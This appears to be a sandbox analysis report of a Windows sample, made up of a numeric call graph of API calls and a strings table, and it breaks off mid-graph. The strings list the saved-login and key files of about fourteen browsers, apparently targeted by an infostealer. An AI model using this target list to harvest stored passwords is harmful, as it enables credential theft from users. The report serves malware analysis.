6cc92a2a 69852->69854 69891 6cca2df1 69852->69891 69853 6cc9281d _mbstowcs_s 69853->69829 69856 6cc92c33 sqlite3_free sqlite3_free 69854->69856 69855->69850 69855->69853 69859 6cca1b25 3 API calls 69855->69859 69885 6cc92c4a 69856->69885 69858 6cc92a85 69865 6cc92c18 69858->69865 69866 6cc92aa5 memset 69858->69866 69861 6cc928b1 69859->69861 69860 6cc92c51 sqlite3_mutex_leave 69860->69853 69862 6cc928c4 69861->69862 69863 6cc928d3 memcpy 69861->69863 69864 6cc928f2 69861->69864 69869 6cc92a5b sqlite3_free 69862->69869 69873 6cc928e5 sqlite3_mutex_enter 69863->69873 69872 6cc92912 sqlite3_free 69864->69872 69864->69873 69865->69856 69917 6cca2808 10 API calls 69865->69917 69867 6cc92ac4 69866->69867 69884 6cc92ad2 69866->69884 69870 6cca250d 17 API calls 69867->69870 69869->69853 69870->69884 69872->69869 69874 6cc9293c sqlite3_mutex_enter 69873->69874 69876 6cc929f9 sqlite3_mutex_leave sqlite3_free 69874->69876 69882 6cc92964 69874->69882 69876->69850 69880 6cc92c8d 69876->69880 69877 6cc92d15 69918 6cc922e8 sqlite3_mutex_leave 69877->69918 69879 6cc929c6 69879->69876 69880->69865 69880->69877 69881 6cc92c6f sqlite3_mutex_enter sqlite3_mutex_leave 69881->69880 69882->69879 69883 6cc92a36 sqlite3_mutex_leave sqlite3_mutex_leave sqlite3_free 69882->69883 69883->69862 69884->69865 69884->69880 69884->69881 69885->69853 69885->69860 69886->69827 69887->69831 69888->69838 69889->69841 69890->69828 69894 6cca2e49 69891->69894 69892 6cca1c46 4 API calls 69893 6cca2f84 69892->69893 69895 6cca2f8c 69893->69895 69896 6cca2fa0 69893->69896 69897 6cca1b25 3 API calls 69894->69897 69898 6cca2e70 69894->69898 69915 6cca2f53 69894->69915 69895->69898 69899 6cca2f94 sqlite3_free 69895->69899 69900 6cca2fdc memcpy 69896->69900 69901 6cca3074 69896->69901 69905 6cca2eaf 69897->69905 69898->69858 69899->69898 69902 6cca2ffb memcpy 69900->69902 69903 6cca3014 memcpy memcpy sqlite3_free 69900->69903 69907 6cca311b 69901->69907 69919 6cca249f 69901->69919 69902->69903 69903->69901 69905->69898 69913 6cca2f45 sqlite3_free 69905->69913 69905->69915 69906 6cca30ae 69908 6cca3191 69906->69908 69922 6cc64380 sqlite3_uri_parameter 69906->69922 69907->69908 69924 6cca415a memset 69907->69924 69908->69898 69925 6cc8a360 sqlite3_mutex_enter sqlite3_mutex_leave sqlite3_mutex_enter sqlite3_mutex_leave sqlite3_free 69908->69925 69911 6cca3232 sqlite3_free 69911->69898 69913->69898 69914 6cca30ff 69914->69907 69923 6cc64380 sqlite3_uri_parameter 69914->69923 69915->69892 69917->69854 69918->69885 69926 6cc6790e 69919->69926 69920 6cca24bb 69920->69906 69922->69914 69923->69907 69924->69908 69925->69911 69927 6cc6791d memset 69926->69927 69929 6cc6796c 69927->69929 69929->69927 69931 6cc67b6f 69929->69931 69933 6cc67b61 sqlite3_free 69929->69933 69934 6cc679f1 CreateFileW 69929->69934 69935 6cc67a72 sqlite3_free sqlite3_free 69929->69935 69936 6cc67acc sqlite3_free sqlite3_free 69929->69936 69937 6cc67a9e 69929->69937 69943 6cc67aba 69929->69943 69944 6ccc2cbc 69929->69944 69950 6ccc2211 30 API calls 69929->69950 69951 6cc6a334 16 API calls _mbstowcs_s 69929->69951 69932 6cc67b74 sqlite3_free 69931->69932 69932->69943 69933->69932 69934->69929 69935->69929 69935->69937 69941 6cc67afa 69936->69941 69952 6ccc257f 13 API calls _mbstowcs_s 69937->69952 69953 6cc64380 sqlite3_uri_parameter 69941->69953 69943->69920 69945 6ccc2cd6 69944->69945 69946 6ccc2d0f 69945->69946 69947 6cca1c46 4 API calls 69945->69947 69946->69929 69948 6ccc2ce7 69947->69948 69948->69946 69949 6ccc2d06 sqlite3_free 69948->69949 69949->69946 69950->69929 69951->69929 69952->69943 69953->69943 69954 6cccc31e 69955 6cccc348 69954->69955 69956 6cccc332 69954->69956 69960 6cccc6d0 69955->69960 69956->69955 69957 6cccc338 PR_SetError 69956->69957 69959 6cccc356 69957->69959 69961 6cccc72b PR_EnterMonitor 69960->69961 69962 6cccc726 69960->69962 69964 6cccc74f MultiByteToWideChar 69961->69964 69965 6cccc73f 69961->69965 69998 6ccd3dd3 83 API calls _mbstowcs_s 69962->69998 69966 6cccc796 MultiByteToWideChar 69964->69966 69967 6cccc771 69964->69967 69968 6cccc7ad WideCharToMultiByte 69965->69968 69966->69968 69970 6cccc8c0 GetLastError 69966->69970 69999 6cccc9a0 malloc 69967->69999 69971 6cccc7cd 69968->69971 69975 6cccc7d3 69968->69975 69989 6cccc871 69970->69989 70000 6cccc9a0 malloc 69971->70000 69974 6cccc7fc WideCharToMultiByte 69977 6cccc815 69974->69977 69978 6cccc837 GetLastError 69974->69978 69975->69974 69975->69978 69976 6cccc8cc PR_SetError 70001 6cccc028 ___swprintf_l PR_SetErrorText _mbstowcs_s 69976->70001 69991 6cccc921 strrchr 69977->69991 69978->69976 69981 6cccc902 PR_ExitMonitor 69984 6cccc91d _mbstowcs_s 69981->69984 69983 6cccc8dd 69983->69981 69984->69959 69985 6cccc826 PR_Calloc 69985->69978 69986 6cccc844 LoadLibraryExW 69985->69986 69987 6cccc874 strdup 69986->69987 69988 6cccc863 GetLastError 69986->69988 69987->69989 69990 6cccc8ab PR_LogPrint 69987->69990 69988->69989 69989->69976 69989->69983 69990->69989 69993 6cccc952 69991->69993 69992 6cccc943 strrchr 69992->69993 69993->69992 69994 6cccc81b 69993->69994 69995 6cccc957 _stricmp 69993->69995 69994->69983 69994->69985 69995->69993 69996 6cccc972 69995->69996 69996->69994 69997 6cccc980 PR_LogPrint 69996->69997 69997->69994 69998->69961 70001->69983 70002 6cccc9ff 70003 6cccca08 70002->70003 70004 6cccca0d 70002->70004 70006 6cccc9b4 GetSystemInfo 70003->70006 70007 6cccc9d1 70006->70007 70007->70004 70008 6ccd39ba 70009 6ccd39cb 70008->70009 70010 6ccd39c6 70008->70010 70012 6ccd39d6 70009->70012 70013 6ccd3a41 70009->70013 70022 6ccd40f7 70010->70022 70016 6ccd3a14 PR_Lock 70012->70016 70017 6ccd39e2 PR_Lock PR_NotifyAllCondVar PR_Unlock 70012->70017 70014 6ccd3a46 PR_SetError 70013->70014 70015 6ccd3a52 70013->70015 70014->70015 70018 6ccd3a2f 70016->70018 70017->70015 70019 6ccd3a34 PR_Unlock 70018->70019 70020 6ccd3a21 PR_WaitCondVar 70018->70020 70019->70015 70020->70018 70023 6ccd4258 70022->70023 70024 6ccd4104 12 API calls 70022->70024 70023->70009 70040 6cccfe37 TlsAlloc TlsAlloc TlsAlloc GetModuleHandleW 70024->70040 70026 6ccd41d1 _mbstowcs_s 70043 6ccdbcbe PR_Calloc 70026->70043 70028 6ccd41ea 70029 6ccd41f9 PR_NewLock 70028->70029 70044 6ccda791 PR_NewLock PR_NewLock PR_Calloc 70029->70044 70031 6ccd420e 70054 6ccc6349 PR_GetFileMethods 70031->70054 70033 6ccd4218 _mbstowcs_s 70061 6ccc7de4 15 API calls _mbstowcs_s 70033->70061 70035 6ccd4227 70062 6cccc58e 7 API calls 70035->70062 70037 6ccd422c PR_NewLock PR_NewCondVar 70063 6ccd2058 PR_NewLock PR_NewLock 70037->70063 70039 6ccd4249 _mbstowcs_s 70039->70023 70041 6cccfe74 70040->70041 70042 6cccfe63 GetProcAddress 70040->70042 70041->70026 70042->70041 70043->70028 70064 6ccda189 70044->70064 70046 6ccda7d9 70047 6ccda82f PR_Abort 70046->70047 70048 6ccda7e4 TlsSetValue 70046->70048 70049 6ccda834 70047->70049 70050 6ccda7f6 PR_NewCondVar 70048->70050 70069 6cccfe9e 70049->70069 70050->70049 70055 6ccc59f7 70054->70055 70056 6ccc6357 8 API calls 70055->70056 70057 6ccc63b4 70056->70057 70058 6cccec9d WSAStartup 70057->70058 70074 6cccd438 GetCurrentProcess OpenProcessToken 70058->70074 70060 6cccecc6 _mbstowcs_s 70060->70033 70061->70035 70062->70037 70063->70039 70065 6ccda198 70064->70065 70066 6ccda1a1 PR_Calloc 70064->70066 70065->70066 70067 6ccda1b5 _PR_MD_NEW_LOCK 70066->70067 70068 6ccda1e1 70066->70068 70067->70068 70068->70046 70070 6cccfeb1 GetCurrentProcess GetCurrentThread GetCurrentProcess DuplicateHandle 70069->70070 70071 6cccfef2 CreateSemaphoreA 70069->70071 70072 6cccfee0 GetCurrentThreadId 70070->70072 70073 6cccfedb PR_NewLock 70070->70073 70071->70073 70072->70071 70073->70031 70075 6cccd47c 70074->70075 70076 6cccd4a3 GetTokenInformation GetLengthSid 70074->70076 70077 6cccd48b GetLastError PR_LogPrint 70075->70077 70080 6cccd571 _mbstowcs_s 70075->70080 70083 6cccc9a0 malloc 70076->70083 70077->70080 70080->70060 70084 6ccc7cb4 70085 6ccc7cc5 PR_Calloc 70084->70085 70086 6ccc7cc0 70084->70086 70088 6ccc7cfb 70085->70088 70089 6ccc7cd7 strdup 70085->70089 70091 6ccd3dd3 83 API calls _mbstowcs_s 70086->70091 70092 6ccc80a1 PR_GetEnv _stricmp _stricmp __stdio_common_vsscanf _mbstowcs_s 70089->70092 70091->70085 70092->70088 70093 40125b 70096 40e5a3 InitializeCriticalSection 70093->70096 70148 406099 GetProcessHeap HeapAlloc 70096->70148 70098 40e5f2 70149 403411 70098->70149 70101 403411 9 API calls 70102 40e63b 70101->70102 70103 4036f7 4 API calls 70102->70103 70104 40e648 70103->70104 70159 4032e6 70104->70159 70107 403549 3 API calls 70108 40e65d 70107->70108 70164 405feb VirtualFree 70108->70164 70110 40e665 70165 405feb VirtualFree 70110->70165 70112 40e670 70113 411177 3 API calls 70112->70113 70114 40e675 70113->70114 70115 40e67a 70114->70115 70116 40e6af 70114->70116 70118 403411 9 API calls 70115->70118 70117 4032e6 5 API calls 70116->70117 70119 40e6b9 70117->70119 70120 40e686 70118->70120 70121 403549 3 API calls 70119->70121 70122 4032e6 5 API calls 70120->70122 70123 40e6c6 70121->70123 70124 40e690 70122->70124 70168 405feb VirtualFree 70123->70168 70126 403549 3 API calls 70124->70126 70127 40e69d 70126->70127 70166 405feb VirtualFree 70127->70166 70128 40e6ad 70130 40357c 9 API calls 70128->70130 70132 40e6db 70130->70132 70131 40e6a5 70133 403411 9 API calls 70131->70133 70134 40357c 9 API calls 70132->70134 70133->70128 70135 40e6e3 70134->70135 70136 40357c 9 API calls 70135->70136 70137 40e6f2 70136->70137 70167 410c3e SHCreateDirectoryExW 70137->70167 70139 40e6f9 70140 403549 3 API calls 70139->70140 70141 40e706 70140->70141 70142 40357c 9 API calls 70141->70142 70143 40e712 70142->70143 70144 40357c 9 API calls 70143->70144 70145 40e71f 70144->70145 70146 40357c 9 API calls 70145->70146 70147 401260 70146->70147 70148->70098 70150 403422 70149->70150 70151 40341d 70149->70151 70153 4036f7 4 API calls 70150->70153 70170 405feb VirtualFree 70151->70170 70154 403430 70153->70154 70155 403447 5 API calls 70154->70155 70156 403438 70155->70156 70169 405feb VirtualFree 70156->70169 70158 403440 70158->70101 70160 401052 70159->70160 70161 403308 ExpandEnvironmentStringsW 70160->70161 70162 4036f7 4 API calls 70161->70162 70163 40332d 70162->70163 70163->70107 70164->70110 70165->70112 70166->70131 70167->70139 70168->70128 70169->70158 70170->70150 70171 6cc65efb 70172 6cc65f0f 70171->70172 70173 6cc65f24 sqlite3_mutex_enter 70172->70173 70175 6cc65f14 70172->70175 70185 6cca9aea 70173->70185 70176 6cc6602a 70177 6cc6607c sqlite3_mutex_leave 70176->70177 70177->70175 70178 6cc65f58 sqlite3_sql 70184 6cc65f40 70178->70184 70179 6cc66005 sqlite3_reset 70179->70184 70180 6cc6602c sqlite3_value_text 70180->70176 70181 6cc65fa6 sqlite3_mutex_enter 70182 6cc65fe9 sqlite3_mutex_leave 70181->70182 70181->70184 70182->70184 70183 6cca9aea 75 API calls 70183->70184 70184->70176 70184->70177 70184->70178 70184->70179 70184->70180 70184->70181 70184->70182 70184->70183 70186 6cca9afb sqlite3_reset 70185->70186 70192 6cca9b02 70185->70192 70186->70192 70187 6cca9baf 70206 6ccb2234 19 API calls 70187->70206 70188 6cca9bb6 70201 6ccacdb5 70188->70201 70191 6cca9bb4 70198 6cca9bea 70191->70198 70207 6cc846f2 _except1 70191->70207 70193 6cca9b28 70192->70193 70194 6cca9b77 70192->70194 70197 6cca9b0a 70192->70197 70205 6cca2412 _except1 70192->70205 70193->70197 70209 6ccb465d memset memcpy memmove memcpy 70193->70209 70194->70187 70194->70188 70197->70184 70198->70193 70208 6cc7410f sqlite3_mutex_leave 70198->70208 70202 6ccace04 70201->70202 70210 6ccb1d2e 57 API calls 70202->70210 70204 6ccb150b _mbstowcs_s 70204->70191 70205->70194 70206->70191 70207->70198 70208->70193 70209->70197 70210->70204 70211 6cccc2f1 PR_LoadLibraryWithFlags 70212 6cc63b5b sqlite3_initialize 70213 6cc63b80 70212->70213 70215 6cc63b7c _mbstowcs_s 70212->70215 70216 6ccab782 70213->70216 70223 6ccab7bd __aulldiv __aullrem __aulldvrm 70216->70223 70217 6ccac4c2 _mbstowcs_s 70217->70215 70218 6ccac4cf 70226 6cca9c48 70218->70226 70220 6cca9c48 12 API calls 70220->70223 70221 6cc8fdd5 10 API calls 70221->70223 70222 6cca1b25 malloc sqlite3_mutex_enter sqlite3_mutex_leave 70222->70223 70223->70217 70223->70218 70223->70220 70223->70221 70223->70222 70224 6ccac032 memset 70223->70224 70225 6ccac14a memset 70223->70225 70224->70223 70225->70223 70227 6cca9c68 70226->70227 70228 6cca9c5c 70226->70228 70230 6cca9c6c memcpy 70227->70230 70231 6cca9c66 70227->70231 70232 6cc74610 70228->70232 70230->70231 70231->70217 70237 6cca9ca2 70232->70237 70234 6cc74621 70235 6cc7463f 70234->70235 70236 6cc74629 memcpy 70234->70236 70235->70231 70236->70235 70238 6cca9cb6 70237->70238 70239 6cca9caf 70237->70239 70238->70239 70241 6cca9d2b 70238->70241 70243 6cc63cd7 sqlite3_initialize 70238->70243 70239->70234 70241->70239 70242 6cca9d50 memcpy 70241->70242 70242->70239 70244 6cc63ce7 70243->70244 70245 6cc63ce3 70243->70245 70248 6cca664e 70244->70248 70245->70241 70249 6cca666a 70248->70249 70250 6cca665b 70248->70250 70252 6cca6675 sqlite3_free 70249->70252 70253 6cca6684 70249->70253 70251 6cca1b25 3 API calls 70250->70251 70255 6cc63cf5 70251->70255 70252->70255 70254 6cca66c5 sqlite3_mutex_enter 70253->70254 70253->70255 70256 6cca66d8 70254->70256 70255->70241 70260 6cc65a7f realloc 70256->70260 70257 6cca6767 sqlite3_mutex_leave 70257->70255 70258 6cca671e 70258->70257 70261 6cc65a97 malloc_usable_size 70260->70261 70262 6cc65ab0 70260->70262 70261->70262 70262->70258 70263 6cc63b3b sqlite3_initialize 70264 6cc63b47 70263->70264 70265 6cc63b4b sqlite3_vmprintf 70263->70265 70266 6cca6f94 70273 6cca9050 70266->70273 70268 6cca6fbb 70272 6cca6fc4 70268->70272 70281 6cc93e94 sqlite3_initialize sqlite3_mutex_enter sqlite3_vfs_find sqlite3_mutex_leave 70268->70281 70270 6cca700f 70282 6cca8cae memcpy memset memcpy memmove memcpy 70270->70282 70274 6cca9062 70273->70274 70280 6cca90c0 70273->70280 70274->70280 70283 6cca8f23 70274->70283 70278 6cca908d 70278->70280 70290 6ccb5c19 70278->70290 70280->70268 70281->70270 70282->70272 70284 6cca8f3c 70283->70284 70285 6cca8f53 70283->70285 70286 6ccb5c19 80 API calls 70284->70286 70287 6ccb5c19 80 API calls 70285->70287 70286->70285 70288 6cca8f6f 70287->70288 70288->70280 70289 6cca6eca 80 API calls 70288->70289 70289->70278 70291 6ccb5c24 70290->70291 70293 6ccb5c2b 70290->70293 70291->70280 70293->70291 70294 6ccb5c19 80 API calls 70293->70294 70296 6cc8db20 70293->70296 70309 6ccb5cc2 80 API calls 70293->70309 70294->70293 70302 6cc8db4a 70296->70302 70304 6cc8db52 70296->70304 70297 6cc8dd2f 70297->70302 70327 6ccb8d0a memset memcpy memset 70297->70327 70301 6ccb5c19 80 API calls 70301->70304 70302->70293 70304->70297 70304->70301 70304->70302 70310 6ccc2db3 70304->70310 70321 6cca18fe 70304->70321 70325 6cc93e94 sqlite3_initialize sqlite3_mutex_enter sqlite3_vfs_find sqlite3_mutex_leave 70304->70325 70326 6ccb4783 80 API calls 70304->70326 70306 6cc96cdf memset memcpy 70307 6cc8dd42 70306->70307 70307->70302 70307->70306 70308 6cca2667 memset memcpy memset 70307->70308 70308->70307 70309->70293 70315 6ccc2dd2 70310->70315 70311 6ccc2f7d 70313 6ccb5c19 80 API calls 70311->70313 70312 6ccc2f98 70314 6ccb5c19 80 API calls 70312->70314 70316 6ccc2f8f 70313->70316 70314->70316 70315->70311 70315->70312 70318 6ccc2e2f 70315->70318 70316->70318 70328 6cc93e94 sqlite3_initialize sqlite3_mutex_enter sqlite3_vfs_find sqlite3_mutex_leave 70316->70328 70318->70304 70319 6ccc3004 70319->70318 70320 6ccb5c19 80 API calls 70319->70320 70320->70318 70322 6cca190e 70321->70322 70329 6cca17f6 70322->70329 70324 6cca1936 70324->70304 70325->70304 70326->70304 70327->70307 70328->70319 70336 6cca6622 70329->70336 70331 6cca1805 70332 6cca180a 70331->70332 70335 6cca18a2 70331->70335 70340 6ccb4c2d malloc sqlite3_mutex_enter sqlite3_mutex_leave memcpy 70331->70340 70332->70324 70335->70332 70341 6ccb4d0c malloc sqlite3_mutex_enter sqlite3_mutex_leave memset sqlite3_free 70335->70341 70337 6cca663f 70336->70337 70338 6cca6635 70336->70338 70337->70331 70342 6cc9fb3a 70338->70342 70340->70335 70341->70332 70343 6cc9fb61 70342->70343 70346 6cc9fb6c 70342->70346 70348 6cc9fd1a 70343->70348 70345 6cc9fba8 70345->70337 70346->70345 70347 6cc9fd1a 70 API calls 70346->70347 70347->70346 70351 6cc9fd90 70348->70351 70349 6cc9fdb2 _mbstowcs_s 70349->70346 70350 6cc9fddc 70353 6cc9fde4 70350->70353 70355 6cc9feff sqlite3_exec 70350->70355 70351->70349 70351->70350 70356 6cc911b5 70351->70356 70366 6cc922e8 sqlite3_mutex_leave 70353->70366 70355->70353 70359 6cc911c9 70356->70359 70358 6cc9138b 70358->70350 70360 6cc91211 70359->70360 70363 6cc91238 70359->70363 70364 6cc911f0 70359->70364 70374 6cc9427f sqlite3_mutex_enter 70360->70374 70363->70364 70367 6cc851ab 70363->70367 70375 6cc86f27 memset 70363->70375 70376 6cc922e8 sqlite3_mutex_leave 70364->70376 70366->70349 70368 6cca36c8 54 API calls 70367->70368 70369 6cc851bc 70368->70369 70370 6cc6f706 33 API calls 70369->70370 70373 6cc8526b 70369->70373 70371 6cc851d4 70370->70371 70372 6cc85279 memcmp 70371->70372 70371->70373 70372->70373 70373->70363 70375->70363 70376->70358 70377 40121f 70380 4143af 70377->70380 70387 4117b7 CreateMutexA 70380->70387 70382 4143c4 70388 406099 GetProcessHeap HeapAlloc 70382->70388 70384 4143cc 70385 401224 70384->70385 70389 414e7b 70384->70389 70387->70382 70388->70384 70401 406099 GetProcessHeap HeapAlloc 70389->70401 70391 414e9b 70402 406099 GetProcessHeap HeapAlloc 70391->70402 70393 414ec5 70395 414ed1 70393->70395 70412 414611 GetProcessHeap HeapAlloc 70393->70412 70403 4148b6 CoInitialize CoCreateInstance 70395->70403 70398 414ef1 70398->70385 70399 414ee3 70399->70398 70413 4146e1 12 API calls 70399->70413 70401->70391 70402->70393 70404 414a0d 70403->70404 70410 4148f6 70403->70410 70404->70398 70404->70399 70406 41493d VariantInit 70406->70410 70407 4149e7 CoUninitialize 70407->70404 70410->70404 70410->70406 70410->70407 70410->70410 70414 406099 GetProcessHeap HeapAlloc 70410->70414 70415 414b6e GetProcessHeap HeapAlloc 70410->70415 70416 402503 GetProcessHeap HeapAlloc 70410->70416 70412->70395 70413->70399 70414->70410 70415->70410 70416->70410

                                                                                      Control-flow Graph

                                                                                      Strings
                                                                                      • \Blisk\User Data\Local State, xrefs: 0040BA3F
                                                                                      • \Chromium\User Data\Default\Login Data, xrefs: 0040BA5F
                                                                                      • \Vivaldi\User Data\Default\Login Data, xrefs: 0040BA95
                                                                                      • \Chromium\User Data\Local State, xrefs: 0040BA5A
                                                                                      • \UCBrowser\User Data_i18n\Default\UC Login Data.17, xrefs: 0040B9F2
                                                                                      • \Comodo\Dragon\User Data\Local State, xrefs: 0040BAAB
                                                                                      • \Torch\User Data\Local State, xrefs: 0040BAC6
                                                                                      • \Tencent\QQBrowser\User Data\Default\Login Data, xrefs: 0040BA0D
                                                                                      • \Vivaldi\User Data\Local State, xrefs: 0040BA8E
                                                                                      • \Torch\User Data\Default\Login Data, xrefs: 0040BACB
                                                                                      • \CentBrowser\User Data\Local State, xrefs: 0040BAFC
                                                                                      • \Tencent\QQBrowser\User Data\Local State, xrefs: 0040BA08
                                                                                      • \Epic Privacy Browser\User Data\Local State, xrefs: 0040B9B6
                                                                                      • \Microsoft\Edge\User Data\Default\Login Data, xrefs: 0040B9D6
                                                                                      • \Comodo\Dragon\User Data\Default\Login Data, xrefs: 0040BAB0
                                                                                      • \Opera Software\Opera Stable\Login Data, xrefs: 0040BA29
                                                                                      • \UCBrowser\User Data_i18n\Local State, xrefs: 0040B9ED
                                                                                      • \Epic Privacy Browser\User Data\Default\Login Data, xrefs: 0040B9BB
                                                                                      • \Google\Chrome\User Data\Local State, xrefs: 0040B99B
                                                                                      • \CentBrowser\User Data\Default\Login Data, xrefs: 0040BB01
                                                                                      • \Opera Software\Opera Stable\Local State, xrefs: 0040BA24
                                                                                      • \Microsoft\Edge\User Data\Local State, xrefs: 0040B9D1
                                                                                      • \Slimjet\User Data\Local State, xrefs: 0040BAE1
                                                                                      • \BraveSoftware\Brave-Browser\User Data\Default\Login Data, xrefs: 0040BA7A
                                                                                      • \Google\Chrome\User Data\Default\Login Data, xrefs: 0040B9A0
                                                                                      • \BraveSoftware\Brave-Browser\User Data\Local State, xrefs: 0040BA75
                                                                                      • \Blisk\User Data\Default\Login Data, xrefs: 0040BA44
                                                                                      • \Slimjet\User Data\Default\Login Data, xrefs: 0040BAE6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: FilePath$lstrcatlstrcpy$BinaryCopyExistsOpenType$CloseCombineEnumFolderInfoPrivateProfileQuerySpecialString
                                                                                      • String ID: \Blisk\User Data\Default\Login Data$\Blisk\User Data\Local State$\BraveSoftware\Brave-Browser\User Data\Default\Login Data$\BraveSoftware\Brave-Browser\User Data\Local State$\CentBrowser\User Data\Default\Login Data$\CentBrowser\User Data\Local State$\Chromium\User Data\Default\Login Data$\Chromium\User Data\Local State$\Comodo\Dragon\User Data\Default\Login Data$\Comodo\Dragon\User Data\Local State$\Epic Privacy Browser\User Data\Default\Login Data$\Epic Privacy Browser\User Data\Local State$\Google\Chrome\User Data\Default\Login Data$\Google\Chrome\User Data\Local State$\Microsoft\Edge\User Data\Default\Login Data$\Microsoft\Edge\User Data\Local State$\Opera Software\Opera Stable\Local State$\Opera Software\Opera Stable\Login Data$\Slimjet\User Data\Default\Login Data$\Slimjet\User Data\Local State$\Tencent\QQBrowser\User Data\Default\Login Data$\Tencent\QQBrowser\User Data\Local State$\Torch\User Data\Default\Login Data$\Torch\User Data\Local State$\UCBrowser\User Data_i18n\Default\UC Login Data.17$\UCBrowser\User Data_i18n\Local State$\Vivaldi\User Data\Default\Login Data$\Vivaldi\User Data\Local State
                                                                                      • API String ID: 2377953819-4166025770
                                                                                      • Opcode ID: af0e8215d43d86ec813ed7c32a791ee83cf9178e76964a2c84bf0da7e0c0b8c7
                                                                                      • Instruction ID: b504e976bd3a8729c7f51a6cb9f8188f68cbd7fbd8cbaae42897a142990720c6
                                                                                      • Opcode Fuzzy Hash: af0e8215d43d86ec813ed7c32a791ee83cf9178e76964a2c84bf0da7e0c0b8c7
                                                                                      • Instruction Fuzzy Hash: 8C71A730355704ABD224FB62CD62E9A37A9EF89704F10443EF5166B2E1CFB96841CB9D

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1087 6cc92770-6cc927b3 1088 6cc927bd 1087->1088 1089 6cc927b5-6cc927b7 1087->1089 1091 6cc927bf-6cc927c1 1088->1091 1089->1088 1090 6cc927b9-6cc927bb 1089->1090 1090->1091 1092 6cc92828-6cc9282a 1091->1092 1093 6cc927c3-6cc927c8 1091->1093 1094 6cc9282c-6cc92830 1092->1094 1095 6cc92832-6cc92837 1092->1095 1096 6cc927ca-6cc927d1 1093->1096 1094->1095 1097 6cc927dc 1094->1097 1098 6cc92839-6cc92844 1095->1098 1099 6cc927df-6cc927ea 1095->1099 1100 6cc927d3-6cc927da 1096->1100 1101 6cc92825 1096->1101 1097->1099 1102 6cc927ed-6cc927f5 1098->1102 1099->1102 1100->1096 1100->1097 1101->1092 1103 6cc9280c-6cc9281b call 6cca1c46 1102->1103 1104 6cc927f7-6cc927f9 1102->1104 1109 6cc9281d-6cc92820 1103->1109 1110 6cc92846-6cc9285b 1103->1110 1105 6cc927fb-6cc927fd 1104->1105 1106 6cc927ff-6cc92809 1104->1106 1105->1103 1105->1106 1106->1103 1111 6cc92c5b-6cc92c6b call 6cd4e4d7 1109->1111 1112 6cc92a19-6cc92a28 call 6cca1c46 1110->1112 1113 6cc92861-6cc9286a 1110->1113 1121 6cc92a69-6cc92a8f call 6cca2df1 1112->1121 1122 6cc92a2a-6cc92a31 1112->1122 1115 6cc9286c-6cc9286e 1113->1115 1116 6cc92874-6cc92879 1113->1116 1115->1112 1115->1116 1116->1112 1119 6cc9287f-6cc928c2 call 6cca9e52 call 6cca1b25 1116->1119 1137 6cc928cb-6cc928d1 1119->1137 1138 6cc928c4-6cc928c6 1119->1138 1132 6cc92c1f-6cc92c21 1121->1132 1133 6cc92a95-6cc92ac2 call 6cca359f memset 1121->1133 1124 6cc92c33-6cc92c47 sqlite3_free * 2 1122->1124 1127 6cc92c4a-6cc92c4f 1124->1127 1130 6cc92c58 1127->1130 1131 6cc92c51-6cc92c57 sqlite3_mutex_leave 1127->1131 1130->1111 1131->1130 1132->1124 1135 6cc92c23-6cc92c26 1132->1135 1144 6cc92ac4-6cc92acd call 6cca250d 1133->1144 1145 6cc92ae7 1133->1145 1135->1124 1141 6cc92c28-6cc92c32 call 6cca2808 1135->1141 1139 6cc928d3-6cc928e2 memcpy 1137->1139 1140 6cc928f2-6cc92910 1137->1140 1143 6cc92a5a 1138->1143 1146 6cc928e5-6cc928ec 1139->1146 1140->1146 1158 6cc92912-6cc92919 sqlite3_free 1140->1158 1141->1124 1148 6cc92a5b-6cc92a64 sqlite3_free 1143->1148 1155 6cc92ad2-6cc92ae5 1144->1155 1153 6cc92ae9-6cc92aeb 1145->1153 1150 6cc9291e-6cc92928 1146->1150 1151 6cc928ee-6cc928f0 1146->1151 1148->1111 1156 6cc92929-6cc9293a sqlite3_mutex_enter 1150->1156 1151->1156 1153->1132 1157 6cc92af1-6cc92b16 1153->1157 1155->1153 1162 6cc9293c-6cc9293e 1156->1162 1163 6cc92940-6cc92948 1156->1163 1159 6cc92b18-6cc92b21 1157->1159 1160 6cc92b24-6cc92b35 1157->1160 1158->1148 1159->1160 1164 6cc92b3e-6cc92b69 1160->1164 1165 6cc92b37-6cc92b3a 1160->1165 1166 6cc92949-6cc9295e sqlite3_mutex_enter 1162->1166 1163->1166 1170 6cc92b99-6cc92ba0 1164->1170 1171 6cc92b6b-6cc92b70 1164->1171 1165->1164 1167 6cc929f9-6cc92a13 sqlite3_mutex_leave sqlite3_free 1166->1167 1168 6cc92964 1166->1168 1167->1112 1174 6cc92c8d-6cc92c91 1167->1174 1173 6cc9296a-6cc92972 1168->1173 1176 6cc92bae 1170->1176 1177 6cc92ba2-6cc92ba8 1170->1177 1171->1170 1175 6cc92b72-6cc92b97 1171->1175 1179 6cc92974-6cc92981 1173->1179 1181 6cc92c93-6cc92c9b 1174->1181 1182 6cc92d05-6cc92d0f 1174->1182 1180 6cc92bb0-6cc92bc9 call 6cca35c0 1175->1180 1176->1180 1177->1176 1178 6cc92baa 1177->1178 1178->1176 1184 6cc929aa-6cc929ac 1179->1184 1185 6cc92983-6cc92987 1179->1185 1180->1132 1198 6cc92bcb-6cc92bde 1180->1198 1181->1182 1187 6cc92c9d-6cc92ca0 1181->1187 1182->1132 1183 6cc92d15-6cc92d2a call 6cc91af0 call 6cc922e8 1182->1183 1213 6cc92d3d-6cc92d46 1183->1213 1214 6cc92d2c-6cc92d3c call 6cca341d 1183->1214 1193 6cc929af-6cc929b1 1184->1193 1190 6cc92989-6cc92998 1185->1190 1191 6cc929a6-6cc929a8 1185->1191 1188 6cc92ca3-6cc92ca7 1187->1188 1194 6cc92ca9-6cc92cad 1188->1194 1195 6cc92caf-6cc92cb9 1188->1195 1190->1184 1197 6cc9299a-6cc929a4 1190->1197 1191->1193 1199 6cc929bf-6cc929c4 1193->1199 1200 6cc929b3-6cc929bd 1193->1200 1194->1195 1201 6cc92cbd-6cc92cbf 1194->1201 1195->1188 1202 6cc92cbb 1195->1202 1197->1179 1197->1191 1198->1182 1204 6cc92be4-6cc92bea 1198->1204 1199->1173 1206 6cc929c6 1199->1206 1200->1199 1205 6cc929c8-6cc929d1 1200->1205 1208 6cc92cc3-6cc92cc8 1201->1208 1202->1182 1209 